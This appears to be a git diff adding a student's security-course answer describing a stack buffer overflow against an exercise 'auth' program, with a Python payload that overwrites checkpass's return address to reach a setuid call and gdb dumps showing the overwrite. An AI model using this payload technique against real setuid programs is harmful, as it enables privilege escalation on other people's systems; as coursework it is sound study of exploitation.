1 files changed, 47 insertions, 0 deletions

diff --git a/CamilStaps-s4498062-Assignment-3/ex4 b/CamilStaps-s4498062-Assignment-3/ex4
new file mode 100644
index 0000000..47214a6
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-3/ex4
@@ -0,0 +1,47 @@
+a
+    That would be 0x40085a.
+
+b
+    Done. That gives a root shell:
+
+    $ ./auth "$(python -c 'import struct; print "A"*264+struct.pack("<Q",0x40085a)')"
+    ERROR: password incorrect
+    # 
+    Segmentation fault
+
+c
+    The return address of checkpass has been overwritten with the address of the
+    setuid call. So, after executing checkpass as normally, we 'return' to that
+    setuid call. This explains why we don't read "Starting root shell".
+
+        (gdb) ...
+        0x000000000040082d  14      strcpy(password,input);
+           0x000000000040082a <checkpass+10>:   48 89 e7    mov    rdi,rsp
+        => 0x000000000040082d <checkpass+13>:   e8 0e fe ff ff  call   0x400640 <strcpy@plt>
+        (gdb) x /64bx ($rsp+256)
+        0x7ffe5af18c50: 0x40    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
+    --> 0x7ffe5af18c58: 0xf2    0x06    0x40    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
+        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
+        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
+        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00
+        (gdb) ni
+        15      hash1 = crypt(password,"$6$1122334455667788$");
+        => 0x0000000000400832 <checkpass+18>:   be 24 09 40 00  mov    esi,0x400924
+           0x0000000000400837 <checkpass+23>:   48 89 e7    mov    rdi,rsp
+           0x000000000040083a <checkpass+26>:   e8 41 fe ff ff  call   0x400680 <crypt@plt>
+        (gdb) x /64bx ($rsp+256)
+        0x7ffe5af18c50: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
+    --> 0x7ffe5af18c58: 0x5a    0x08    0x40    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
+        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
+        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
+        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00
+
+    The relevant line is marked with -->. Before the strcpy, the correct return
+    address is there. After, there is our own address.
+